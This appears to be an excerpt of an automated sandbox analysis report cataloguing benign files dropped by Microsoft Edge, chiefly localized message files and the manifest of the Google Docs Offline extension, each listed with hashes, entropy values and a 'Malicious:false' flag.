                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11406
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                    MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                    SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                    SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                    SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                    MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                    SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                    SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                    SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
